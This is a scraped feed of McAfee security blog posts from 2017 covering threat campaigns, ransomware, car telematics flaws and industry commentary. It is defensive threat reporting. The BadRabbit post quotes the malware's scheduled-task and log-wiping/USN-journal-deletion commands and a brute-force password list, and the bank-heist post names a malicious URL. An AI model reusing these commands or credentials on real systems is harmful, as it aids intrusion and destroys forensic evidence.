But that’s not all of interest. We also discovered that the 2017 sample contained code blocks associated with another interesting malware family: BlackEnergy. Let’s look at an example of the code similarities we discovered:

A BlackEnergy sample from 2016 (at left) alongside a Dragonfly sample from 2017.

Self-deleting code is very common in malware, but it is usually implemented by creating a batch file and executing the batch instead of directly calling the delete command, as we see in the preceding examples.

The BlackEnergy sample used in our comparison was captured in the Ukraine on October 31, 2015, and was mentioned in our post on the evolution of the BlackEnergy Trojan. It is remarkable that this piece of code is almost identical in both samples, and suggests a correlation between the BlackEnergy and Dragonfly campaigns.

Actor Sophistication

Our analysis of this attack tells a story about the actors’ capability and skills. Their attack precision is very good; they know whom and what to attack, using a variety of efforts. Their focus is on Windows systems and they use well-known practices to gather information and credentials. From our research, we have seen the evolution of the code in their backdoors and the reuse of code in their campaigns.

How well do the actors cover their tracks? We conclude they are fairly sophisticated in hiding details of their attacks, and in some cases in leaving details behind to either mislead or make a statement. We rate threat actors by scoring them in different categories; we have  mentioned a few. The Dragonfly group is in the top echelon of targeting attackers; it is critical that those in the targeted sectors be aware of them.

The Dragonfly group is most likely after intellectual property or insights into the sector they target, with the ability to take offensive disruptive and destructive action, as was reported in the 2015 attack on the Ukrainian power grid by a BlackEnergy malware family.

 

We would like to thank the team at Intezer for their assistance and support during our research.

The post Operation Dragonfly Analysis Suggests Links to Earlier Attacks appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-dragonfly-analysis-suggests-links-to-earlier-attacks/feed/ 0
McAfee Labs Reports All-Time Highs for Malware in Latest Count https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-reports-all-time-highs-for-malware-in-latest-count/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-reports-all-time-highs-for-malware-in-latest-count/#respond Mon, 18 Dec 2017 05:01:32 +0000 https://securingtomorrow.mcafee.com/?p=82952 In the third quarter of 2017, McAfee Labs reports all-time highs of new and total malware. What is causing the increasing numbers of malware that are submitted to us at an average rate of four new malware samples per second? One major trend that continues in Q3 is the abuse of Microsoft Office–related exploits and […]

The post McAfee Labs Reports All-Time Highs for Malware in Latest Count appeared first on McAfee Blogs.

]]>
In the third quarter of 2017, McAfee Labs reports all-time highs of new and total malware. What is causing the increasing numbers of malware that are submitted to us at an average rate of four new malware samples per second?

One major trend that continues in Q3 is the abuse of Microsoft Office–related exploits and the use of malicious code in macros that activates PowerShell to execute them, so-called fileless attacks.

In March, an exploit was released that took advantage of CVE-2017-0199, a vulnerability in how Microsoft Office and WordPad handle specially crafted files that could result in remote code execution. During Q3, we saw an increase in the number of crafted files that were submitted. We also noticed that many releases take advantage of a toolkit on GitHub that makes it quite easy to create a “backdoor” attack:

Another major event in Q3 was a massive spam campaign to distribute a new version of the infamous Locky ransomware “Lukitus.” Within 24 hours, more than 23 million emails were sent. Shortly after the first arrived, security company Comodo Labs discovered another campaign related to this attack that sent more than 62,000 spam emails distributing the ransomware.

With banking Trojans, we observed the greatest activity from the Trickbot Trojan. We saw several variations in which the actors added new features to their code, for example, cryptocurrency stealing, embedding the EternalBlue exploit, and employing different ways of delivering the malware, which primarily targets the financial sector.

Another banking Trojan family that appeared often during the quarter was Emotet. In several spamming campaigns users were asked to download a Microsoft Word document from several locations. From our analysis of the attached document, we found the payload was hidden in the macros that used PowerShell to install the Trojan.

These major campaigns and others caused a tsunami of spam email, distributing a tremendous number of samples that increased the malware storage demands of all of us in the security industry.

For more details and our usual statistics on malware, breach incidents, and web and network threats, read the McAfee Labs Threats Report, December 2017.

The post McAfee Labs Reports All-Time Highs for Malware in Latest Count appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-reports-all-time-highs-for-malware-in-latest-count/feed/ 0
Lazarus Cybercrime Group Moves to Mobile Platform https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-cybercrime-group-moves-to-mobile/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-cybercrime-group-moves-to-mobile/#respond Mon, 20 Nov 2017 12:02:16 +0000 https://securingtomorrow.mcafee.com/?p=82480 When it comes to describing cyberattacks, the word sophisticated is used a lot. Whether to explain yet another “advanced” campaign by a threat actor group hoping to steal information or disrupt computer systems, it seems the precursor to any analysis is to call it sophisticated. Yet the modus operandi for many of these groups is […]

The post Lazarus Cybercrime Group Moves to Mobile Platform appeared first on McAfee Blogs.

]]>
When it comes to describing cyberattacks, the word sophisticated is used a lot. Whether to explain yet another “advanced” campaign by a threat actor group hoping to steal information or disrupt computer systems, it seems the precursor to any analysis is to call it sophisticated. Yet the modus operandi for many of these groups is to begin an attack with a simple email, which for some time has been one of the most effective malware delivery mechanisms.

The McAfee Mobile Research team has identified a new threat—Android malware that poses as a legitimate app available from Google Play and targets South Korean users—that suggests a deviation from the traditional playbook. An analysis of campaign code, infrastructure, and tactics and procedures suggests the Lazarus group is responsible, as they evolve their attack tactics to now operate within the mobile platform. And although the debate regarding attribution of attacks will always rage, documenting evolving tactics by threat actor groups allows organizations and consumers to adapt their defenses accordingly.

Based on what we know, the app first appeared in the wild in March 2017. The distribution is very low and is aimed at a Korean Audience (based on telemetry hits).

Although we cannot be certain, persons associated with GodPeople, an organization based in Seoul with a history of supporting religious groups in North Korea and the developers of the original application, could be the intended targets. GodPeople is sympathetic to individuals from North Korea, helping to produce a movie about underground church groups in the North. Previous dealings with the Korean Information Security Agency on discoveries in the Korean peninsula have shown that religious groups are often the target of such activities in Korea.

Evolving Attack Tactics

Leveraging email as the entry vector allows attackers to be very specific about whom they wish to target, often described as the spear phishing. Developing a malicious application does not provide the same level of granularity. However, in this instance the attackers developed malware that poses as a legitimate APK, advertising itself as means for reading the Bible in Korean. Leveraging the mobile platform as the attack vector is potentially significant—particularly as South Korea has a significant mobile population that is “in a race to be first with 5G,” according to a Forbes article. Typically when a mobile platform is mentioned, we think about our mobile phones. However, in this case, we know South Korea has an increasing use of tablets, replacing traditional laptops. How well secured are tablets and how are they monitored?

Evolving attacks onto the mobile platform are likely to continue, and this appears to be the first example of the Lazarus group using mobile. Such a change, therefore, is significant, demonstrating that criminals are keeping up with platform popularity. Indeed, according to the International Telecommunication Union, the global number of mobile subscriptions worldwide now exceeds the global population, which suggests that such a tactic is only likely to increase as our dependency on mobile platforms grows.

Source: International Telecommunication Union.

Keeping Safe

Understanding the evolving tactics by nefarious actors is imperative. It is critical that we adopt simple security measures to counter these new tactics. This malware is detected as “Android/Backdoor” by McAfee Mobile Security. Always keep your mobile security application updated to the latest version. And never install applications from unverified sources.

The post Lazarus Cybercrime Group Moves to Mobile Platform appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-cybercrime-group-moves-to-mobile/feed/ 0
‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/badrabbit-ransomware-burrows-russia-ukraine/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/badrabbit-ransomware-burrows-russia-ukraine/#comments Tue, 24 Oct 2017 22:31:49 +0000 https://securingtomorrow.mcafee.com/?p=81528 This post was researched and written by Christiaan Beek, Tim Hux, David Marcus, Charles McFarland, Douglas McKee, and Raj Samani. McAfee is currently investigating a ransomware campaign known as BadRabbit, which initially infected targets in Russia and the Ukraine. We are also investigating reports of infected systems in Germany, Turkey, and Bulgaria and will provide updates […]

The post ‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine appeared first on McAfee Blogs.

]]>
This post was researched and written by Christiaan Beek, Tim Hux, David Marcus, Charles McFarland, Douglas McKee, and Raj Samani.

McAfee is currently investigating a ransomware campaign known as BadRabbit, which initially infected targets in Russia and the Ukraine. We are also investigating reports of infected systems in Germany, Turkey, and Bulgaria and will provide updates as more information becomes available. For McAfee product coverage, please see “How McAfee Products Can Protect Against BadRabbit Ransomware.”

When victims visit the following site, a dropper is downloaded:

hxxp://1dnscontrol[dot]com/flash_install.php

After infection, the victim sees the following screen:

The ransomware is currently charging 0.05 Bitcoin; however, there is no confirmation that paying the ransom will result in a decryption key being provided.

A decryption site at the following .onion (Tor) domain displays the time that victims have left before the price goes up:

caforssztxqzf2nm[dot]onion

Files with the following extensions are encrypted:

.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf .der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key .mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx .php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff .vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.

The malware starts a command-line with following values:

Cmd /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR “C:\Windows\system32\cmd.exe /C Start \”\” \”C:\Windows\dispci.exe\” -id 1082924949 && exit”

“/TN rheagal” refers to a system account with the name rhaegal used to create the scheduled task and start the ransomware file dispci.exe. Rhaegal is likely a reference to a dragon from the popular TV show “Game of Thrones.” In fact, three dragon names—Rhaegal, Viserion, and Drogon—are used in relation to the following scheduled tasks:

The malware then uses the following commands to clear security logs and delete the update sequence number (USN) change journal, which is used to recover files, for example:

Cmd /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:

The USN change journal provides a persistent log of all changes made to files on the volume, according to the Microsoft Developer Network. As files, directories, and other NTFS objects are added, deleted, and modified, NTFS enters records into the USN change journal, one for each volume on the computer. Each record indicates the type of change and the object changed. New records are appended to the end of the stream.

We also found a DNS query to ACA807(x)ipt.aol[dot]com, in which the “##” is a two-digit hex number from 00-FF ACA807##.ipt.aol[dot]com.

We created a graph of the events occurring during an infection by one of the BadRabbit samples. The initial binary loads itself into memory and kills the initial process. Further processes drop configuration, services files, and other artifacts used in the attacks. The graph ends with the creation of the preceding scheduled tasks.

Embedded Credentials

One of the samples (579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648) seems to contain a list of default credentials with an attempt to brute-force credentials and get the scheduled tasks to execute the ransomware:

  • secret
  • 123321
  • zxc321
  • zxc123
  • qwerty123
  • qwerty
  • qwe321
  • qwe123
  • 111111
  • password
  • test123
  • admin123Test123
  • Admin123
  • user123
  • User123
  • guest123
  • Guest123
  • administrator123
  • Administrator123
  • 1234567890
  • 123456789
  • 12345678
  • 1234567
  • 123456
  • adminTest
  • administrator
  • netguest
  • superuser
  • nasadmin
  • nasuser
  • ftpadmin
  • ftpuser
  • backup
  • operator
  • other user
  • support
  • manager
  • rdpadmin
  • rdpuser
  • user-1
  • Administrator

Game of Thrones Fans?

It is common for attackers to use pop-culture references in their attacks. These attackers seem to have an interest in “Game of Thrones,” with at least three references to the series. Viserion, Rhaegal, and Drogon are names of scheduled tasks. GrayWorm, the name of a “Game of Thrones” commander, is the product name in the binary’s EXIF data.

Detection

There are currently three samples associated with this ransomware campaign, representing the dropper and the main executable. McAfee detects all three:

  • 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
  • 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
  • 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648

 

The post ‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/badrabbit-ransomware-burrows-russia-ukraine/feed/ 2
Ransomware Decryption Framework – Now Available https://securingtomorrow.mcafee.com/business/ransomware-decryption-framework-now-available/ https://securingtomorrow.mcafee.com/business/ransomware-decryption-framework-now-available/#respond Thu, 19 Oct 2017 16:04:38 +0000 https://securingtomorrow.mcafee.com/?p=80675 This blog details the availability of the McAfee Ransomware Recover (Mr 2).  We would like to credit Kunal Mehta and Charles McFarland in the work required to develop this framework. How do I get my files back?  This is probably the first question asked when ransomware strikes. Of course, the answer will depend on whether there […]

The post Ransomware Decryption Framework – Now Available appeared first on McAfee Blogs.

]]>
This blog details the availability of the McAfee Ransomware Recover (Mr 2).  We would like to credit Kunal Mehta and Charles McFarland in the work required to develop this framework.

How do I get my files back?  This is probably the first question asked when ransomware strikes. Of course, the answer will depend on whether there is a backup available. Or if a decryption tool exists on the www.nomoreransom.org website.

Developing these tools invariably involve significant effort to identify the decryption keys, but also create a tool that can be tested, hosted and then made freely available to help victims of ransomware. Today however we are pleased to announce the availability of McAfee Ransomware Recover (Mr 2), this framework will allow for the rapid incorporation of decryption keys and custom decryption logic (when they become available) and get help to victims of ransomware a lot quicker.

Now, whilst the availability of a framework is important its probably not something you would say deserves the fanfare of the communications we have produced. However, the key difference here is that this framework is free to use for the security community. So if security researchers have identified decryption keys and custom decryption logic for a ransomware variant, and do not want to spend the time to produce their own tool then McAfee Ransomware Recover (Mr 2) is available to freely use.

Over the course of the next few weeks we will produce more guidance on the tool, including webcasts by the development team. Also, we will remain committed to working with our public and private sector partners to get our hands on as many decryption keys as possible.

Follow us on Twitter for all updates from #MPOWER17 at @McAfee.

The post Ransomware Decryption Framework – Now Available appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/ransomware-decryption-framework-now-available/feed/ 0
Taiwan Bank Heist and the Role of Pseudo Ransomware https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/taiwan-bank-heist-role-pseudo-ransomware/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/taiwan-bank-heist-role-pseudo-ransomware/#respond Thu, 12 Oct 2017 21:34:23 +0000 https://securingtomorrow.mcafee.com/?p=80061 Widespread reports claim the Far Eastern International Bank in Taiwan has become a victim of hacking. The attacks demonstrate the global nature of cybercrime, with the cybercriminals attempting to wire US$60 million to destinations such as Sri Lanka, Cambodia, and the United States.

The post Taiwan Bank Heist and the Role of Pseudo Ransomware appeared first on McAfee Blogs.

]]>
Widespread reports claim the Far Eastern International Bank in Taiwan has become a victim of hacking. The attacks demonstrate the global nature of cybercrime, with the cybercriminals attempting to wire US$60 million to destinations such as Sri Lanka, Cambodia, and the United States. Recent reports from Sri Lanka say that two individuals have been arrested for suspected money laundering after a tip-off from the Bank of Ceylon, which reported a suspicious transfer of $1.2 million from the Far Eastern International Bank.

On Saturday October 7, Far Eastern International Bank reported that it had recovered most of the money and that overall losses could reach $500,000.

How did the attack happen?

Based on the initial intelligence we have received, the first direct interaction with the victim began with spear phishing attacks that contained “backdoor” attachments.

Figures 1 and 2 provide some examples of the attachments.

Figure 1: Spear phishing attachment.

Figure 2: Spear phishing attachment.

When the victim clicks on the link, they are redirected to a malicious site that downloads additional files to the victim’s computer. One example of these malicious sites is hxxps://jobsbankbd.com/maliciousfilename.exe.

This site hosts another backdoor that gives the criminals access to the victim’s system in the bank.

Once the criminals gain access to the systems, our initial analysis reveals that the attackers harvested credentials. This was confirmed by evidence we found in a sample that contained the following credentials from the bank:

  • FEIB\SPUSER14
  • FEIB\scomadmin

These credentials are used to create a scheduled task on the system and monitor the running of endpoint security services. (This does not indicate a problem with the security software, only that the attackers did their research and took measures to take out the security software being run within the bank.) We have notified the security provider, and have provided all of our research to date.

Besides the scheduled task and credentials, we discovered another interesting piece of code. Inside the sample was the resource “IMAGE,” which seemed to be a zip file. Once extracted, we found the file aa.txt. Although this appeared to be a text file, it was really an executable.

The file contains code that scans for the installed languages, especially:

  • 419 (Russian)
  • 422 (Ukrainian)
  • 423 (Belarusian)

If these languages are detected, the file will not run. We have seen this behavior before in ransomware families.

When analyzing the strings of this particular file, we discovered some interesting ones:

  • HERMES 2.1 TEST BUILD, press ok
  • HERMES

When executed, the file proved to be ransomware. However, no note or wallpaper indicated that this was ransomware. After the file finished running, only one thing appeared on the desktop:

Figure 3: The final screen of this pseudo ransomware.

And in every directory a file:

The original Hermes ransomware note points toward this file; but in our case, we saw no note, nor demand for ransom. The Hermes ransomware family surfaced in February:

We suspect that this is another example of pseudo ransomware. Was the ransomware used to distract the real purpose of this attack? We strongly believe so.

Based on our sources, the ransomware attack started in the network when the unauthorized payments were being sent.

Where next?

Clearly this was a very carefully crafted attack, and specifically targeted at one bank. The attackers identified specific individuals to email, and understood the security measures being deployed. Although the samples we identified are now covered by our security products, we urge caution in anyone assuming that “I am protected.” The criminals took their time to understand how the bank works and developed the necessary code to enable them to steal millions. An effective security posture must anticipate such highly skilled attackers.

Because this is related an active law enforcement investigation, we are limiting what information we publicly share and will publish further updates only if that does not conflict with a current investigation.

The post Taiwan Bank Heist and the Role of Pseudo Ransomware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/taiwan-bank-heist-role-pseudo-ransomware/feed/ 0
The Hack Back: A Double-Edged Sword https://securingtomorrow.mcafee.com/business/hack-back-double-edged-sword/ https://securingtomorrow.mcafee.com/business/hack-back-double-edged-sword/#respond Fri, 29 Sep 2017 21:00:38 +0000 https://securingtomorrow.mcafee.com/?p=79473 Global cyberattacks like Mirai, WannaCry and Petya have left victims feeling helpless and eager to gain back the data they’ve lost at the hands of cybercriminals. This modern threat landscape has everyone looking towards new solutions and strategies—any way they can help protect others while staying secure themselves. So, it’s no surprise that the idea […]

The post The Hack Back: A Double-Edged Sword appeared first on McAfee Blogs.

]]>
Global cyberattacks like Mirai, WannaCry and Petya have left victims feeling helpless and eager to gain back the data they’ve lost at the hands of cybercriminals. This modern threat landscape has everyone looking towards new solutions and strategies—any way they can help protect others while staying secure themselves. So, it’s no surprise that the idea of the “hack back” is gaining some traction. The hack back, a notion that came to light in various congressional proposals that are intended to put tools in the hands of victims to identify alleged attackers, halt an alleged attack, and potentially recover or delete stolen information.

This legislation, first proposed back in May, features policies intended to empower victims of a cyberattack, while still trying to ensure accountability. It states a mandatory reporting requirement for entities that use active-defense techniques, which is intended to help federal law enforcement ensure defenders use these tools responsibly. It also includes an exemption allowing the recovery or destruction of one’s own data if it’s located using the active-defense techniques permitted by this bill and does not result in the destruction of data belonging to another person.

While the objective of the legislation is laudable, helping companies improve their ability to defend themselves, we have to consider some of its risks that could include actions that may well cause damage to parties that either innocently were part of an attack, or through false flag operations that have no direct involvement. For instance, we’ve recently seen that the emerging intent from many attackers is to point the source of attacks to another party, such as was witnessed during the Operation Troy attacks. The use of hacking back in this scenario would have caused damage to a third party.

Our approach, and one we would recommend to others, is to take direct action against malicious actors by utilizing the expertise of law enforcement. A strong partnership between the public and private sector to hold cybercriminals accountable is essential in maintaining a safer society. So, if you do undergo a cyberattack, your first action should be contacting the authorities immediately. From there, experts will handle the situation in a way that ensures safety for all innocent parties involved.

There is a lesson to be learned from the notion of hacking back, however. Instead of hacking back, rather learn how to think like a hacker in order to identify cyberattacks and flag them before the damage is done. By thinking proactively, the need to take reactive measures lessens and the power shifts back to where it belongs: with you.

For more information on fighting back against hackers, read McAfee Labs’ latest Quarterly Threats Report and be sure to follow us at @McAfee and @McAfee_Labs.

The post The Hack Back: A Double-Edged Sword appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/hack-back-double-edged-sword/feed/ 0
DEFCON – Connected Car Security https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/defcon-connected-car-security/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/defcon-connected-car-security/#respond Wed, 02 Aug 2017 21:54:05 +0000 https://securingtomorrow.mcafee.com/?p=76677 Sometime in the distant past, that thing in your driveway was a car.  However, the “connected car is already the third-fastest growing technological device after phones and tablets.”  The days when a Haynes manual, a tool kit, and a free afternoon/week to work on the car are fast becoming a distant memory. Our connected cars […]

The post DEFCON – Connected Car Security appeared first on McAfee Blogs.

]]>
Sometime in the distant past, that thing in your driveway was a car.  However, the “connected car is already the third-fastest growing technological device after phones and tablets.”  The days when a Haynes manual, a tool kit, and a free afternoon/week to work on the car are fast becoming a distant memory.

Our connected cars today generate up to 4,000GB of data per 50Kb every second and using on-board cameras generates 20MB to 40MB per second. Not only do these devices generate significant data, but there are so many connectivity options with the cars we use each day. With the continuing introduction of more connected features to cars, and our dependency on connected cars only increasing, a key part of the focus within our Advanced Threats Research team has been to consider the possible attack vectors in automotive.

2016: the year of ransomware

It seems that every year is the year of ransomware!  In 2016, however, the reality of ransomware on IoT was demonstrated following research the team did in identifying a vulnerability within a popular In Vehicle Infotainment (IVI) system:  we were able to insert ransomware over the air.  In our demonstration the payload was not malicious, of course.  Well perhaps it was since a very popular 80s song would be played at full volume until the victim paid up!

This demonstrated that the nightmare scenario so often talked about in which you were unable to start your car without paying criminals is indeed something quite possible, but thankfully to date not witnessed in the wild.

DEFCON 2017

So with this year at DEFCON our ATR team, in particular Oleksandr Bazhaniuk, Jesse Michael, and  Mickey Shkatov work continued their focus into automotive.  The start into the research was not particularly auspicious however, with a trip to the wreckers yard in search for hardware that ended up with a car full of loot!

The dashboard was reconstructed in our US Lab.

After fixing some errors, the unit was ready. Since we already worked on an IVI, the on-board IVI looked interesting but after some research we determined it would be quite some work to get into that area. By researching the system’s diagnostic info, we might be successful in retrieving useful data from the navigation system, SRAM and Flash dumps. In one of the dumps, the team discovered a possibly interesting URL, which was referring to a domain owned by a car-manufacturer. After researching the WHOIS credentials of the domain, we discovered that nobody owned it any longer. The team quickly registered the domain and setup generic honeypot to capture any incoming connections of any sort that were sent to the domain.

To our surprise, we had several connection attempts registered with information about the geographic location of the cars, and if the car was currently set to navigate to a particular waypoint, we received the GPS coordinates of that waypoint as well as the name of the waypoint.

After responsibly disclosing this issue in February 2017 to the car manufacturer, a fix for the owners has since been released.

Telematics

We presented these findings during the DEFCON conference this year, and other findings about a Telematics Control Unit (TCU) used in multiple cars across at least four car manufacturers as far as we can confirm. What is a telematics unit? A telematics unit is used by the vehicle to have a connection to the outside world, be it the internet or a manufacturer specific intranet site.

These units are used as a conduit for the car to connect to the backend. This particular telematics unit was using 2G cellular connectivity technology. Investigating the circuit board for interesting components, the team researched the USB interaction by placing an USB sniffer as a ‘Man-in-the-middle’ to learn about the traffic interactions.  What data was being exchanged between the IVI and the modem potentially being shared with outgoing connections.

After more researching and testing, the team found locally exploitable classic buffer overflow vulnerabilities. More and more were discovered, including a known over the air telematics vulnerability discovered by Dr. Ralf-Philipp Weinmann (CVE-2010-3832) using a buffer overflow. After we used one of the local vulnerabilities to write an exploit and extract the baseband firmware of the telematics unit we started our work on reverse engineering the code to see if we could send arbitrary Controller Area Network (CAN bus) messages from the TCU.

We followed again our responsible disclose process and informed the involved parties, including US-CERT. After studying our submission of the findings, US CERT released an advisory on Thursday, the first day of DEFCON, allowing us the time to study it and reference it and any mitigations mentioned in it during our talk on Saturday.

Update

Since the initial notification to Nissan and BMW we have been advised that a free fix via a Technical Service Bulletin has been issued to their dealers, which is available now to all affected customers in U.S. and Canada.

Through the process of coordinating this disclosure via ICS-CERT, we additionally discovered that a small number of other vehicles were also affected by these issues.  We will update this blog as more data becomes available.

Stay up to date on this story and follow @McAfee and @McAfee_Business.

The post DEFCON – Connected Car Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/defcon-connected-car-security/feed/ 0
NoMoreRansom – One year on! https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/nomoreransom-one-year/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/nomoreransom-one-year/#respond Tue, 25 Jul 2017 14:20:05 +0000 https://securingtomorrow.mcafee.com/?p=76357 One year on. It is fair to say that the No More Ransom project not only exceeded our expectations, but simply blew these initial expectations out of the water. A collaboration between six partners (McAfee, EC3, Dutch Police, Kaspersky Lab, AWS and Barracuda) has now grown to include more than 100 partners across the public and private sector. We often hear people talk about Public-Private Partnerships, but here is a true example of that commitment in action.

The post NoMoreRansom – One year on! appeared first on McAfee Blogs.

]]>
One year on.  It is fair to say that the No More Ransom project not only exceeded our expectations, but simply blew these initial expectations out of the water.  A collaboration between six partners (McAfee, EC3, Dutch Police, Kaspersky Lab, AWS and Barracuda) has now grown to include more than 100 partners across the public and private sector.  We often hear people talk about Public-Private Partnerships, but here is a true example of that commitment in action.

Because of this commitment from all the partners, this initiative has resulted in the successful decryption of more than 28,000 computers.  Let us put that into context, for zero cost, victims of ransomware who do not have to be customers of any security provider can get their data back for nothing.  They don’t have to fill in a survey, enter their email address, provide their credit card details, in fact they don’t even have to worry about obfuscating their IP address.  For the first time, there is another option.  No longer are victims faced with the option of a) lose my data or b) pay criminals.

So thank you to all of our partners, thank you to those of you that tweeted, blogged about it.  This site has been successful, in fact so successful that we even have ransomware named after us.

Of course, the Queen of England gets a boat named after her, we get ransomware!  Well that’s okay, because it shows that as the tens of millions of dollars we have prevented going into the hands of criminals, they have taken notice.

We will not stop, in fact, we need more partners, more decryption tools, and more successes.   The message of #DontPay seems to be working (as we witnessed with WannaCry and nPetya), and we will continue in our efforts to hurt the bottom line of criminals.

 

The post NoMoreRansom – One year on! appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/nomoreransom-one-year/feed/ 0
Show me the money – Financial Services Need to Rethink Security https://securingtomorrow.mcafee.com/business/show-money-financial-services-need-rethink-security/ https://securingtomorrow.mcafee.com/business/show-money-financial-services-need-rethink-security/#respond Thu, 22 Jun 2017 04:05:58 +0000 https://securingtomorrow.mcafee.com/?p=75206 Financial institutions are under attack. As gatekeepers to consumers’ and enterprises’ most personal and private information, this industry serves as one of the most lucrative avenues for cybercriminals to pursue. In response, financial services organizations have developed unsustainable security infrastructures that are characterized by a huge proliferation of tools to address “the next big thing” […]

The post Show me the money – Financial Services Need to Rethink Security appeared first on McAfee Blogs.

]]>
Financial institutions are under attack. As gatekeepers to consumers’ and enterprises’ most personal and private information, this industry serves as one of the most lucrative avenues for cybercriminals to pursue. In response, financial services organizations have developed unsustainable security infrastructures that are characterized by a huge proliferation of tools to address “the next big thing” in cyber threats.

As highly publicized breaches continue against financial institutions, organizations are stuck in a frustratingly reactive cycle: with every emerging attack a  new tool or widget is  added to an already  complex arsenal of security solutions. This stockpile of tools often lack automation and Big Data analytics capabilities, preventing IT teams from being able to catalog and respond to threats in a timely manner. Over time, organizations are left struggling to patch holes and close siloed security gaps, always looking to identify the next vulnerability while making it difficult to get ahead.

The industry must move beyond this segregated approach to better protect themselves and their customers. According to Closing the Cybersecurity Gaps in Financial Services, a global survey from Ovum and sponsored by McAfee, an overwhelming number of financial institutions, especially Tier 1 and 2, deploy between 100-200 disparate security solutions.  The report also finds that three percent of global financial services institutions use over 100 security solutions, reducing effectiveness and creating additional operational cost increasing their organization’s cyber risk exposure. Adding to security teams’ burdens: 37 percent of respondents deal with over 200,000 daily security alerts. Security teams are overwhelmed with sifting through and prioritizing the vast amounts of alerts that each security tool is generating often with limited threat intelligence sharing between the various tools in a cohesive and adaptive manner. The sheer amount of manpower required to accurately sift through each alert drains resources and leaves security teams drowning in IT complexity. Not surprisingly, over a third of respondents across EMEA, US and APAC listed integrating and maintaining disparate security tools as their top operational pain point.

Financial institutions operate in a highly complex and interconnected financial ecosystem connecting thousands of entities, networks and users across the globe. Petabytes of data, billions of messages and transactions flow across this interconnected system on a daily basis and make it a daunting task to monitor, detect and block anomalous activities, elusive threats and under-the-radar attacks in real-time. These worries are corroborated by the Ovum study, where 40 percent of respondents indicated that faster threat discovery is their first or second security priority. To enable quicker threat detection, over 70 percent of organizations are planning strategic investments in cloud, web and ATM security.

Ovum highlights some promising trends that point towards a better, more secure future for these organizations. Financial institutions have undergone a significant shift in the decision-making process for cybersecurity initiatives, with teams outside IT such as fraud, compliance, risk management and operations all now taking part. Forty-eight percent of respondents from the fraud team reported they were a decision maker in their company’s cybersecurity initiatives, followed by compliance and risk management – both reporting over 37 percent. This shift highlights the high priority level that financial institutions have put on cybersecurity, which is well-warranted considering that breaches will have severe consequences that reach as far as to fraud, insider/outsider collusion, regulatory compliance and legal. In this regard, these organizations are regarded as the gold standards that all other industries should aspire to.

The financial services industry is in the beginning stages of another industry-wide shift, as over 60 percent of respondents agree that the industry needs better, not more, security tools, which will ultimately enable greater automation, integration and orchestration of tasks, as well as end-to-end visibility across the security infrastructure. The next big financial breach continues to be one of the biggest concerns in the financial services industry, constantly serving as a reminder to organizations for the need of a unified and fully implemented security strategy. Greater automation, integration and orchestration are necessary first steps to provide relief to these teams, which can only be delivered through a unified threat defense architecture. The transformation to an open source communications fabric offers a significant impact on the efficiency and effectiveness for organizations by simplifying the integration of disparate tools and enabling the sharing of threat data.

Join McAfee and a host of financial experts for Transforming Cybersecurity in Financial Services, a free webinar on Thursday, June 22, 2017, at 10 a.m. EST to learn more on current gaps and challenges in financial IT security, emerging threat vectors and attacks, use of machine learning and advanced analytics, best practices that can benefit financial institutions and the path forward.

 

The post Show me the money – Financial Services Need to Rethink Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/show-money-financial-services-need-rethink-security/feed/ 0
